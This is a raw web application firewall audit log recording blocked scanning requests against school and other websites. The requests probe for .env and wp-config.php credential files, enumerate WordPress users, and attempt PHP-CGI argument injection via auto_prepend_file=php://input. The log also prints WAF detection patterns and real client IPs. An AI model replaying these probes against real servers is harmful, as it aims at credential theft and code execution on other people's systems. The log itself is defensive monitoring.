GET /.env HTTP/1.0
Host: vinic.twilightparadox.com
X-Real-IP: 64.23.218.208
X-Forwarded-Host: vinic.twilightparadox.com
X-Forwarded-Server: vinic.twilightparadox.com
X-Forwarded-For: 64.23.218.208
X-Forwarded-Proto: https
Connection: close
User-Agent: Go-http-client/1.1
--68f10a6b-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--68f10a6b-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745533744823561 753 (- - -)
Stopwatch2: 1745533744823561 753; combined=283, p1=251, p2=0, p3=0, p4=0, p5=32, sr=64, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--68f10a6b-Z--
--2e509e42-A--
[25/Apr/2025:05:29:05 +0700] aAq7MT8HMZgF-3Y3GtE77wAAAEY 103.236.140.4 48550 103.236.140.4 8181
--2e509e42-B--
GET /wp-json/wp/v2/users/ HTTP/1.0
Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/
Host: smkn22-jkt.sch.id
X-Real-IP: 178.250.95.78
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 178.250.95.78
X-Forwarded-Proto: https
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36
--2e509e42-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--2e509e42-H--
Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Stopwatch: 1745533745708489 2534 (- - -)
Stopwatch2: 1745533745708489 2534; combined=1194, p1=405, p2=762, p3=0, p4=0, p5=27, sr=73, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--2e509e42-Z--
--8462472a-A--
[25/Apr/2025:05:32:14 +0700] aAq77uOdEP6frSVs8ComegAAAAs 103.236.140.4 50486 103.236.140.4 8181
--8462472a-B--
GET /wp-config.php HTTP/1.0
Referer: www.google.com
Host: up.smkn22jakarta.sch.id
X-Real-IP: 188.166.180.248
X-Forwarded-Host: up.smkn22jakarta.sch.id
X-Forwarded-Server: up.smkn22jakarta.sch.id
X-Forwarded-For: 188.166.180.248
X-Forwarded-Proto: http
Connection: close
User-Agent: Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Accept-Language: en-US,en;q=0.9,fr;q=0.8
--8462472a-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--8462472a-H--
Message: Access denied with code 403 (phase 1). Matched phrase "wp-config.php" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745533934108173 891 (- - -)
Stopwatch2: 1745533934108173 891; combined=371, p1=334, p2=0, p3=0, p4=0, p5=37, sr=128, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--8462472a-Z--
--1a63cc38-A--
[25/Apr/2025:05:32:14 +0700] aAq77vKu9d5eAb6Kn9_gMQAAANY 103.236.140.4 50488 103.236.140.4 8181
--1a63cc38-B--
GET /wp-config.php HTTP/1.0
Referer: www.google.com
Host: up.smkn22jakarta.sch.id
X-Real-IP: 188.166.180.248
X-Forwarded-Host: up.smkn22jakarta.sch.id
X-Forwarded-Server: up.smkn22jakarta.sch.id
X-Forwarded-For: 188.166.180.248
X-Forwarded-Proto: https
Connection: close
User-Agent: Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Accept-Language: en-US,en;q=0.9,fr;q=0.8
--1a63cc38-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--1a63cc38-H--
Message: Access denied with code 403 (phase 1). Matched phrase "wp-config.php" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745533934131995 719 (- - -)
Stopwatch2: 1745533934131995 719; combined=280, p1=251, p2=0, p3=0, p4=0, p5=29, sr=66, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--1a63cc38-Z--
--ea08c009-A--
[25/Apr/2025:05:33:04 +0700] aAq8IOXF4ZX3hX-IbN6c9AAAAJc 103.236.140.4 51056 103.236.140.4 8181
--ea08c009-B--
GET /wp-json/wp/v2/users/ HTTP/1.0
Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/
Host: smkn22-jkt.sch.id
X-Real-IP: 92.205.6.43
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 92.205.6.43
X-Forwarded-Proto: https
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36
--ea08c009-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--ea08c009-H--
Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Stopwatch: 1745533984546279 2583 (- - -)
Stopwatch2: 1745533984546279 2583; combined=1332, p1=421, p2=881, p3=0, p4=0, p5=29, sr=70, sw=1, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--ea08c009-Z--
--32737b11-A--
[25/Apr/2025:05:42:21 +0700] aAq-TeXF4ZX3hX-IbN6elQAAAJI 103.236.140.4 57680 103.236.140.4 8181
--32737b11-B--
GET /wp-config.php HTTP/1.1
Referer: www.google.com
Host: perpustakaan.smkn22jakarta.sch.id
X-Real-IP: 188.166.180.248
X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id
X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id
X-Forwarded-Proto: http
User-Agent: Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Upgrade-Insecure-Requests: 1
Accept-Language: en-US,en;q=0.9,fr;q=0.8
Cookie:
X-Forwarded-For: 188.166.180.248
Accept-Encoding: gzip
X-Varnish: 137399906
--32737b11-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Content-Type: text/html; charset=iso-8859-1
--32737b11-H--
Message: Access denied with code 403 (phase 1). Matched phrase "wp-config.php" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745534541311221 866 (- - -)
Stopwatch2: 1745534541311221 866; combined=356, p1=317, p2=0, p3=0, p4=0, p5=39, sr=114, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--32737b11-Z--
--916b7402-A--
[25/Apr/2025:05:42:21 +0700] aAq-TeXF4ZX3hX-IbN6elgAAAJM 103.236.140.4 57684 103.236.140.4 8181
--916b7402-B--
GET /wp-config.php HTTP/1.1
Referer: www.google.com
Host: perpustakaan.smkn22jakarta.sch.id
X-Real-IP: 188.166.180.248
X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id
X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id
X-Forwarded-Proto: https
User-Agent: Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Upgrade-Insecure-Requests: 1
Accept-Language: en-US,en;q=0.9,fr;q=0.8
Cookie:
X-Forwarded-For: 188.166.180.248
Accept-Encoding: gzip
X-Varnish: 137319573
--916b7402-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Content-Type: text/html; charset=iso-8859-1
--916b7402-H--
Message: Access denied with code 403 (phase 1). Matched phrase "wp-config.php" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745534541330263 645 (- - -)
Stopwatch2: 1745534541330263 645; combined=255, p1=225, p2=0, p3=0, p4=0, p5=29, sr=61, sw=1, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--916b7402-Z--
--40ef6125-A--
[25/Apr/2025:05:47:13 +0700] aAq_cT8HMZgF-3Y3GtE_fQAAAEI 103.236.140.4 59132 103.236.140.4 8181
--40ef6125-B--
GET /wp-json/wp/v2/users/ HTTP/1.0
Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/
Host: smkn22-jkt.sch.id
X-Real-IP: 181.129.169.170
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 181.129.169.170
X-Forwarded-Proto: https
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36
--40ef6125-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--40ef6125-H--
Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Stopwatch: 1745534833854478 3237 (- - -)
Stopwatch2: 1745534833854478 3237; combined=1329, p1=435, p2=865, p3=0, p4=0, p5=29, sr=74, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--40ef6125-Z--
--2e8daa7b-A--
[25/Apr/2025:06:10:52 +0700] aArE_PKu9d5eAb6Kn9_jmgAAAMI 103.236.140.4 36480 103.236.140.4 8181
--2e8daa7b-B--
GET /wp-json/wp/v2/users/ HTTP/1.0
Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/
Host: smkn22-jkt.sch.id
X-Real-IP: 105.27.192.254
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 105.27.192.254
X-Forwarded-Proto: https
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36
--2e8daa7b-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--2e8daa7b-H--
Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Stopwatch: 1745536252731626 15613 (- - -)
Stopwatch2: 1745536252731626 15613; combined=26052, p1=501, p2=905, p3=0, p4=0, p5=12338, sr=119, sw=0, l=0, gc=12308
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--2e8daa7b-Z--
--73421646-A--
[25/Apr/2025:06:31:23 +0700] aArJy_Ku9d5eAb6Kn9_k1wAAAMM 103.236.140.4 41264 103.236.140.4 8181
--73421646-B--
GET /.env HTTP/1.0
Host: petruk.hauganslekt.no
X-Real-IP: 206.81.24.74
X-Forwarded-Host: petruk.hauganslekt.no
X-Forwarded-Server: petruk.hauganslekt.no
X-Forwarded-For: 206.81.24.74
X-Forwarded-Proto: http
Connection: close
User-Agent: Go-http-client/1.1
--73421646-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--73421646-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745537483220327 772 (- - -)
Stopwatch2: 1745537483220327 772; combined=333, p1=297, p2=0, p3=0, p4=0, p5=36, sr=111, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--73421646-Z--
--b084356f-A--
[25/Apr/2025:07:07:21 +0700] aArSOT8HMZgF-3Y3GtFG7gAAAFE 103.236.140.4 59374 103.236.140.4 8181
--b084356f-B--
GET /.env HTTP/1.0
Host: wooin.epicgamer.org
X-Real-IP: 138.68.86.32
X-Forwarded-Host: wooin.epicgamer.org
X-Forwarded-Server: wooin.epicgamer.org
X-Forwarded-For: 138.68.86.32
X-Forwarded-Proto: https
Connection: close
User-Agent: Go-http-client/1.1
--b084356f-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--b084356f-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745539641489172 826 (- - -)
Stopwatch2: 1745539641489172 826; combined=278, p1=240, p2=0, p3=0, p4=0, p5=38, sr=68, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--b084356f-Z--
--72a16f25-A--
[25/Apr/2025:09:00:00 +0700] aArsoOXF4ZX3hX-IbN62XAAAAI0 103.236.140.4 57230 103.236.140.4 8181
--72a16f25-B--
SSTP_DUPLEX_POST /sra_%7BBA195980-CD49-458b-9E23-C84EE0ADCD75%7D/ HTTP/1.0
Host: 103.236.140.4
X-Real-IP: 138.124.180.157
X-Forwarded-Host: 103.236.140.4
X-Forwarded-Server: 103.236.140.4
X-Forwarded-For: 138.124.180.157
X-Forwarded-Proto: https
Connection: close
Accept: */*
--72a16f25-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--72a16f25-H--
Message: Access denied with code 403 (phase 2). Match of "rx ^(?i:(?:[a-z]{3,10}\\s+(?:\\w{3,7}?://[\\w\\-\\./]*(?::\\d+)?)?/[^?#]*(?:\\?[^#\\s]*)?(?:#[\\S]*)?|connect (?:\\d{1,3}\\.){3}\\d{1,3}\\.?(?::\\d+)?|options \\*)\\s+[\\w\\./]+|get /[^?#]*(?:\\?[^#\\s]*)?(?:#[\\S]*)?)$" against "REQUEST_LINE" required. [file "/usr/local/apache/modsecurity-cwaf/rules/12_HTTP_Protocol.conf"] [line "114"] [id "217210"] [rev "1"] [msg "COMODO WAF: Invalid HTTP Request Line||103.236.140.4|F|4"] [data "SSTP_DUPLEX_POST /sra_%7BBA195980-CD49-458b-9E23-C84EE0ADCD75%7D/ HTTP/1.0"] [severity "WARNING"] [tag "CWAF"] [tag "Protocol"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Stopwatch: 1745546400739806 2291 (- - -)
Stopwatch2: 1745546400739806 2291; combined=862, p1=469, p2=366, p3=0, p4=0, p5=27, sr=92, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--72a16f25-Z--
--a6dcbc01-A--
[25/Apr/2025:09:02:03 +0700] aArtG-OdEP6frSVs8CpGWwAAAAE 103.236.140.4 57808 103.236.140.4 8181
--a6dcbc01-B--
GET /wp-json/wp/v2/users/ HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 86.106.74.249
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 86.106.74.249
X-Forwarded-Proto: https
Connection: close
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
Accept-Language: en-US,en;q=0.9
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)
--a6dcbc01-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--a6dcbc01-H--
Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Stopwatch: 1745546523244974 2881 (- - -)
Stopwatch2: 1745546523244974 2881; combined=1324, p1=441, p2=854, p3=0, p4=0, p5=29, sr=99, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--a6dcbc01-Z--
--f1e0bc2b-A--
[25/Apr/2025:09:23:04 +0700] aAryCOXF4ZX3hX-IbN63kQAAAIo 103.236.140.4 34470 103.236.140.4 8181
--f1e0bc2b-B--
GET /.env HTTP/1.0
Host: 103.236.140.4
X-Real-IP: 196.251.86.175
X-Forwarded-Host: 103.236.140.4
X-Forwarded-Server: 103.236.140.4
X-Forwarded-For: 196.251.86.175
X-Forwarded-Proto: https
Connection: close
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.75 Safari/537.36
Accept-Charset: utf-8
--f1e0bc2b-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--f1e0bc2b-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745547784312545 762 (- - -)
Stopwatch2: 1745547784312545 762; combined=304, p1=266, p2=0, p3=0, p4=0, p5=38, sr=72, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--f1e0bc2b-Z--
--3b96d16e-A--
[25/Apr/2025:10:23:40 +0700] aAsAPD8HMZgF-3Y3GtFltAAAAFY 103.236.140.4 50064 103.236.140.4 8181
--3b96d16e-B--
GET /wp-config.php HTTP/1.1
Host: perpustakaan.smkn22jakarta.sch.id
X-Real-IP: 161.35.149.209
X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id
X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id
X-Forwarded-Proto: http
Accept: */*
User-Agent: Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force
Cookie:
X-Forwarded-For: 161.35.149.209
Accept-Encoding: gzip
X-Varnish: 137479380
--3b96d16e-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Content-Type: text/html; charset=iso-8859-1
--3b96d16e-H--
Message: Access denied with code 403 (phase 1). Matched phrase "wp-config.php" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745551420186736 851 (- - -)
Stopwatch2: 1745551420186736 851; combined=343, p1=306, p2=0, p3=0, p4=0, p5=37, sr=79, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--3b96d16e-Z--
--f7c6d279-A--
[25/Apr/2025:11:01:29 +0700] aAsJGT8HMZgF-3Y3GtFoEgAAAFI 103.236.140.4 59610 103.236.140.4 8181
--f7c6d279-B--
GET /.env HTTP/1.0
Host: 103.236.140.4
X-Real-IP: 64.23.236.146
X-Forwarded-Host: 103.236.140.4
X-Forwarded-Server: 103.236.140.4
X-Forwarded-For: 64.23.236.146
X-Forwarded-Proto: https
Connection: close
User-Agent: Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about);
Accept: */*
--f7c6d279-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--f7c6d279-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745553689481448 763 (- - -)
Stopwatch2: 1745553689481448 763; combined=310, p1=269, p2=0, p3=0, p4=0, p5=40, sr=77, sw=1, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--f7c6d279-Z--
--14206e6c-A--
[25/Apr/2025:12:19:34 +0700] aAsbZvKu9d5eAb6Kn98XDgAAANg 103.236.140.4 50136 103.236.140.4 8181
--14206e6c-B--
POST /hello.world?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.0
Host: 103.236.140.4
X-Real-IP: 88.151.34.37
X-Forwarded-Host: 103.236.140.4
X-Forwarded-Server: 103.236.140.4
X-Forwarded-For: 88.151.34.37
X-Forwarded-Proto: https
Connection: close
Content-Length: 221
Accept: */*
Upgrade-Insecure-Requests: 1
User-Agent: Custom-AsyncHttpClient
Content-Type: application/x-www-form-urlencoded
--14206e6c-C--
--14206e6c-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--14206e6c-E--
--14206e6c-H--
Message: Access denied with code 403 (phase 2). Pattern match "(?i)php://(std(in|out|err)|(in|out)put|fd|memory|temp|filter)" at ARGS_NAMES:\xadd allow_url_include=1 \xadd auto_prepend_file=php://input. [file "/usr/local/apache/modsecurity-cwaf/rules/21_PHP_PHPGen.conf"] [line "22"] [id "218420"] [rev "2"] [msg "COMODO WAF: PHP Injection Attack: I/O Stream Found||103.236.140.4|F|2"] [data "Matched Data: php://input found within ARGS_NAMES:\x5cxadd allow_url_include=1 \x5cxadd auto_prepend_file=php://input: \xadd allow_url_include=1 \xadd auto_prepend_file=php://input"] [severity "CRITICAL"] [tag "CWAF"] [tag "PHPGen"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Stopwatch: 1745558374090590 5418 (- - -)
Stopwatch2: 1745558374090590 5418; combined=3754, p1=462, p2=3255, p3=0, p4=0, p5=37, sr=74, sw=0, l=0, gc=0
Response-Body-Transformed: Dechunked
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--14206e6c-Z--
--7f314a0d-A--
[25/Apr/2025:15:27:29 +0700] aAtHcfKu9d5eAb6Kn98hSwAAANY 103.236.140.4 37164 103.236.140.4 8181
--7f314a0d-B--
GET /.env HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 37.202.207.26
X-Forwarded-Host: smkn22-jkt.sch.id
